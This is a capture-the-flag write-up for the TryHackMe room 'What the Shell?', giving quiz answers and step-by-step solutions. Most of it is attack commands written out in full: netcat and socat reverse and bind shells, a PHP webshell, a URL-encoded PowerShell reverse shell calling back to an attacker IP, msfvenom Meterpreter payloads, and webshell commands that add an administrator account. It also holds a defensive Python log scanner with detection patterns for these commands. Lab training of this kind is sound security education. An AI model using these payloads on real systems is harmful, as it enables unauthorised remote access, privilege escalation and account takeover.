This is a write-up for a room called 'What the Shell?' on TryHackMe
Task 3 Types of Shell
Q: Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?
A: R
Q: You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)
A: N
Q: When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?
A: T
Task 4 Netcat
Q: Which option tells netcat to listen?
A: -l
Q: How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?
A: nc 10.10.10.11 8080
Task 5 Netcat Shell Stabilisation
Q: How would you change your terminal size to have 238 columns?
A: stty cols 238
Q: What is the syntax for setting up a Python3 webserver on port 80?
A: sudo python3 -m http.server 80
Task 6 Socat
Q: How would we get socat to listen on TCP port 8080?
A: TCP-L:8080
Task 7 Socat Encrypted Shells
Q: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem"
A: socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0
Q: If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?
A: socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Task 8 Common Shell Payloads
Q: What command can be used to create a named pipe in Linux?
A: mkfifo
Task 9 msfvenom
Q: Generate a staged reverse shell for a 64 bit Windows target, in a .exe format using your TryHackMe tun0 IP address and a chosen port
A: msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port number>
Q: Which symbol is used to show that a shell is stageless?
A: _
Q: What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell
A: msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443
Task 10 Metasploit multi/handler
Q: What command can be used to start a listener in the background?
A: exploit -j
Q: If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?
A: sessions 10
Task 13 Practice and Examples
Q: Try uploading a webshell to the Linux box, then use the command: nc <LOCAL-IP> <PORT> -e /bin/bash to send a reverse shell back to a waiting listener on your own machine
A: create a new file with a '.php' extension containing the statement below
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
upload the file to the deployed machine.
run a netcat listener with the command below
nc -lvnp <port-num>
example: nc -lvnp 1346
To catch the reverse shell we need to run the web shell we uploaded with a GET parameter.
The command we need to use is
nc <ip> <port-num> -e /bin/bash
example: nc 127.0.0.1 5556 -e /bin/bash
We need to pass the above command as the GET parameter of a URL.
http://ip/uploads/shell.php?cmd=nc%20local-ip%20port%20-e%20%2fbin%2fbash
By requesting the above URL, we get a reverse shell.
Note: we need to use %20 to represent a space, and / can be represented by %2f.
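As an added defender-side example (not code from the write-up), here is a small Python check that reads web-server access-log lines, URL-decodes the cmd query parameter the way the note above describes (%20 for a space, %2f for /), and flags values that look like the shell commands used on this page. The log lines and patterns are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not from the write-up). The first one is the
# write-up's own webshell call, with the cmd parameter URL-encoded as the note describes.
SAMPLE_LOG = """\
10.10.10.5 - - [01/Jan/2024:10:00:01 +0000] "GET /uploads/shell.php?cmd=nc%2010.10.10.5%205556%20-e%20%2fbin%2fbash HTTP/1.1" 200 512
10.10.10.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048
10.10.10.5 - - [01/Jan/2024:10:00:03 +0000] "GET /uploads/shell.php?cmd=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%22 HTTP/1.1" 200 128
10.10.10.9 - - [01/Jan/2024:10:00:04 +0000] "GET /uploads/php-reverse-shell.php HTTP/1.1" 200 0
"""

# Command shapes that appear in the write-up: netcat with -e, a shell binary,
# PowerShell socket code and the net user / net localgroup commands.
SUSPICIOUS = [
    re.compile(r"\bnc\b.*\s-e\s", re.I),
    re.compile(r"/bin/(ba)?sh"),
    re.compile(r"powershell.*(TCPClient|iex|Invoke-Expression)", re.I),
    re.compile(r"\bnet\s+(user|localgroup)\b", re.I),
]
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')


def decode_params(target):
    """Split the request target and URL-decode every query value (%20, %2f, ...)."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    # parse_qs already decodes once; unquote again so a double-encoded value surfaces too.
    return parts.path, {k: [unquote(v) for v in vs] for k, vs in params.items()}


def flag_line(line):
    """Return (path, param, decoded_value) when a query value looks like a shell command."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, params = decode_params(m.group("target"))
    for name, values in params.items():
        for value in values:
            if any(p.search(value) for p in SUSPICIOUS):
                return path, name, value
    return None


def scan_log(text):
    """Run flag_line over every line and collect the hits in order."""
    return [hit for hit in map(flag_line, text.splitlines()) if hit]
```

Running scan_log(SAMPLE_LOG) reports the two shell.php requests and ignores the ordinary page request and the parameterless php-reverse-shell.php hit, which has to be caught by file-upload monitoring instead.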
Q: Navigate to /usr/share/webshells/php/php-reverse-shell.php in Kali and change the IP and port to match your tun0 IP with a custom port. Set up a netcat listener, then upload and activate the shell
A: By running the command below, we can copy the reverse shell to our Desktop
cp /usr/share/webshells/php/php-reverse-shell.php /home/kali/Desktop
change the $ip variable value to your tun0 IP address and the $port variable value to any number between 1024 and 65535, then upload the file.
set up a netcat listener with the command
nc -lvnp <port-num>
example: nc -lvnp 5656
access the uploaded file at the URL below
http://ip/uploads/php-reverse-shell.php
now we have a reverse shell
Q: Log into the Linux machine over SSH using the credentials in task 14. Use the techniques in Task 8 to experiment with bind and reverse netcat shells.
A: SSH into the Linux machine
REVERSE SHELL
run the command below on the attacker's terminal
nc -lvnp 5555
run the command below on the target's terminal
nc <tun0-ip> 5555 -e /bin/bash
BIND SHELL
run the command below on the target's terminal
nc -lvnp 5556 -e /bin/bash
run the command below on the attacker's terminal
nc <target-ip> 5556
Q: Practice reverse and bind shells using Socat on the Linux machine. Try both the normal and special techniques.
A: SOCAT REVERSE SHELL
run the command below on the attacker's terminal to start a socat listener
socat TCP-L:5566 -
run the command below on the target's terminal to connect back to the socat listener
socat TCP:<tun0-ip>:5566 EXEC:"bash -li"
SOCAT BIND SHELL
run the command below on the target's terminal
socat TCP-L:7788 EXEC:"bash -li"
run the command below on the attacker's terminal
socat TCP:<ip>:7788 -
SOCAT SPECIAL TECHNIQUES
run the command below on the attacker's terminal
socat TCP-L:5353 FILE:`tty`,raw,echo=0
run the command below on the target's terminal
socat TCP:<tun0-ip>:5353 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Q: Look through Payloads all the Things and try some of the other reverse shell techniques. Try to analyse them and see why they work.
A: Try Payloads of your choice
Q: Switch to the Windows VM. Try uploading and activating the php-reverse-shell. Does this work?
A: No, it's not working
Q: Upload a webshell on the Windows target and try to obtain a reverse shell using Powershell.
A: create a new file containing the statement below and save it with a '.php' extension
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
create a netcat listener on the attacker's machine
nc -lvnp 1337
open the URL below in the browser
http://ip/uploads/shell.php?cmd=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient(%2710.9.220.185%27%2C1337)%3B%24stream%20%3D%20%24client.GetStream()%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile((%24i%20%3D%20%24stream.Read(%24bytes%2C%200%2C%20%24bytes.Length))%20-ne%200)%7B%3B%24data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString(%24bytes%2C0%2C%20%24i)%3B%24sendback%20%3D%20(iex%20%24data%202%3E%261%20%7C%20Out-String%20)%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20(pwd).Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20(%5Btext.encoding%5D%3A%3AASCII).GetBytes(%24sendback2)%3B%24stream.Write(%24sendbyte%2C0%2C%24sendbyte.Length)%3B%24stream.Flush()%7D%3B%24client.Close()%22%0A
note: replace ip with the deployed machine's IP; the address and port inside the PowerShell payload are the attacker's tun0 IP and the listener port
Q: The webserver is running with SYSTEM privileges. Create a new user and add it to the "administrators" group, then login over RDP or WinRM.
A: To create a new user, run the command below
http://<ip>/uploads/shell.php?cmd=net user <username> <password> /add
note: replace ip with the deployed machine's IP and the username and password fields with values of your choice
To add the user to the Administrators group, run the command below
http://<ip>/uploads/shell.php?cmd=net localgroup administrators username /add
note: replace ip with the machine's IP and username with the username created
To log in using RDP, try the command below
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:10.10.16.131 /u:<username> /p:<password>
note: replace username and password in the above command
Q: Experiment using socat and netcat to obtain reverse and bind shells on the Windows Target.
A: NETCAT REVERSE SHELL
start a netcat listener in the attacker's terminal
nc -lvnp 1337
log in to the Windows machine using RDP and run the command below in cmd
nc <tun0-ip> 1337 -e "cmd.exe"
NETCAT BIND SHELL
start a netcat listener in cmd
nc -lvnp 3333 -e "cmd.exe"
run the command below on the attacker's terminal
nc <target-ip> 3333
SOCAT REVERSE SHELL
run the command below on the attacker's terminal
socat TCP-L:8888 -
run the command below in the target's cmd
socat TCP:<tun0-ip>:8888 EXEC:powershell.exe,pipes
SOCAT BIND SHELL
run the command below in cmd to start a socat listener
socat TCP-L:2323 EXEC:powershell.exe,pipes
run the command below on the attacker's terminal
socat TCP:<target-ip>:2323 -
Q: Create a 64bit Windows Meterpreter shell using msfvenom and upload it to the Windows Target. Activate the shell and catch it with multi/handler. Experiment with the features of this shell.
A: To create a 64bit Windows Meterpreter shell, run the command below
msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o shell.exe LHOST=<tun0-ip> LPORT=2020
*upload shell.exe to the target
*run 'msfconsole' in the attacker's terminal
*'use multi/handler'
*set LHOST <tun0-ip>, set LPORT 2020, set payload windows/x64/meterpreter/reverse_tcp
*exploit
This will start a listener
Now execute the shell.exe payload over RDP. After executing the exe, we will have a meterpreter shell.
Q: Create both staged and stageless meterpreter shells for either target. Upload and manually activate them, catching the shell with netcat -- does this work?
A: To create a staged meterpreter shell, use the command below
msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o stagedcmd.exe LHOST=<tun0-ip> LPORT=2020
To create a stageless meterpreter shell, use the command below
msfvenom -p windows/x64/meterpreter_reverse_tcp -f exe -o nonstagedcmd.exe LHOST=<tun0-ip> LPORT=2020
create a netcat listener
nc -lvnp 2020
Does this work?
No, neither the staged nor the stageless meterpreter payload works with a netcat listener.